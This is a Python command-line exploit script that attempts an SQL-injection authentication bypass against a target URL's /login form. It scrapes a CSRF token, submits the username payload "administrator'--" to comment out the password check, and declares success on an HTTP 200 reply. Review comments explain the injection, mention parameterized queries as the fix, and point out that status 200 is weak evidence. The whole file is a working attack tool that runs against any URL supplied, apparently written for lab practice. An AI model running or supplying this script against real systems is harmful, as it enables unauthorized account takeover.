import requests
import argparse
from urllib.parse import urlparse
from bs4 import BeautifulSoup
# Request path of the login form, and the value submitted as the username.
# The payload is a SQL-injection probe: the single quote ends the username
# string literal and `--` starts a comment in most SQL dialects, presumably
# dropping the password condition from the query.  It only has an effect when
# the server assembles its login query by string concatenation; a
# parameterized query / prepared statement treats the whole value as data.
endpoint = "/login"
payload = "administrator'--"

# Command line: one positional argument carrying the base URL.
# NOTE: parsing runs at import time, so importing this module from other code
# reads sys.argv as a side effect.
parser = argparse.ArgumentParser()
parser.add_argument("url", help="the target's URL (e: https://example.com)")
args = parser.parse_args()
input_url = args.url
def get_endpoint(url, endpoint):
    """Build the URL of *endpoint* on the host named by *url*.

    Only the scheme and network location of ``url`` are kept; any path,
    query string or fragment it carries is discarded and ``endpoint`` is
    appended in its place.  No validation is done, so a ``url`` without a
    scheme yields a string that starts with ``://``.
    """
    parts = urlparse(url)
    return "{}://{}{}".format(parts.scheme, parts.netloc, endpoint)
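def exploit(url, endpoint, payload):
    """Submit the login form at *endpoint* with *payload* as the username.

    The login page is fetched first and the ``value`` of its first
    ``<input>`` element is read as the CSRF token.  The form is then posted
    back through the same session with ``payload`` in the ``username`` field
    and a fixed placeholder password.

    Args:
        url: Base URL of the target; only its scheme and host are used.
        endpoint: Path of the login form.
        payload: Value sent in the ``username`` field.

    Returns:
        The HTTP status code of the final response when both requests
        complete without an HTTP error, otherwise the tuple ``(None, None)``.

    NOTE(review): a 2xx status only shows that the server answered without
    an error.  A rejected login can also be served with 200, so the status
    code alone is not evidence that authentication was bypassed.
    """
    login_url = get_endpoint(url, endpoint)
    # The context manager closes the session's pooled connections on exit;
    # the original never closed the session.
    with requests.Session() as session:
        try:
            # NOTE(review): no timeout is passed, so a server that stops
            # responding blocks these calls indefinitely.
            initial_response = session.get(login_url)
            initial_response.raise_for_status()

            soup = BeautifulSoup(initial_response.text, 'html.parser')
            # The first <input> on the page is taken to be the CSRF token
            # field -- presumably true for the intended target; verify.
            token_field = soup.find('input')
            if token_field is None:
                # find() returns None when the page has no <input>; report it
                # instead of failing with AttributeError on .get().
                print("No input field found on the login page\n"
                      "Check again if the endpoint is correct!!!")
                return (None, None)
            csrf_token = token_field.get('value')

            # Named form_data so the dict no longer shadows this function.
            form_data = {
                'csrf': csrf_token,
                'username': payload,
                'password': "anything"
            }
            response = session.request("POST", login_url, data=form_data)
            response.raise_for_status()
            return response.status_code
        except requests.exceptions.ConnectionError:
            print("Connection error occurred\nCheck again if the host is up!!!")
            return (None, None)
        except requests.exceptions.HTTPError as http_err:
            # Replacement field kept on one line: a line break inside a
            # single-quoted f-string is a syntax error before Python 3.12.
            print(f'The host responses with: "{http_err}"\n'
                  'Check again if the host is up!!!')
            return (None, None)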
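def main():
    """Run the login check against the URL from the command line and print
    the outcome."""
    print("Exploiting target...")
    print("-"*50)
    status = exploit(input_url, endpoint, payload)
    # exploit() returns (None, None) on failure, which never compares equal
    # to 200, so every error path lands in the else branch.
    # NOTE(review): 200 is a weak success signal -- a login page that rejects
    # the credentials may also answer 200.  Confirm the result against the
    # response content before treating the endpoint as vulnerable.
    if status == 200:
        # Computed on its own line: a line break inside the replacement field
        # of a single-quoted f-string is a syntax error before Python 3.12.
        target = get_endpoint(input_url, endpoint)
        print(f"Endpoint: {target} (Username Input)")
        print(f"Payload: {payload}")
        print("-"*50)
        print("Exploiting success!!!")
    else:
        print("-"*50)
        print("Fail to exploit the target!!!")


# Run only when executed as a script.
if __name__ == "__main__":
    main()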